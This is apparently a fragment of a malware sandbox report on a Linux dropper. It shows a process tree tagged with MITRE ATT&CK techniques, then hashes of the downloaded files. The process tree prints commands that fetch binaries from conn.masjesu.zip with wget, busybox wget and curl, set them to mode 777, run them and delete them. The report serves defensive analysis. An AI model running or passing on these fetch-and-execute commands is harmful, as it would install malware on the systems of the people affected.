/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:949
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- System Network Configuration Discovery
PID:952
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
210B
MD5dd7152a41b7b5ce2a25403111fc1a490
SHA147d64966c25d5e87bdbc21024c709f66defa8f29
SHA2567e5e4f8efc48436735f91ae22597c0fc92fd55846c210b89af2f8ccef797e8a5
SHA512e7364095136145430f1029b1bedbb3e1ef6f6bd684880a3ae14d26aa0fe082951b33c365abc9bac40ab30f6659db4827874461e168d35f08af1378e18c6b94fd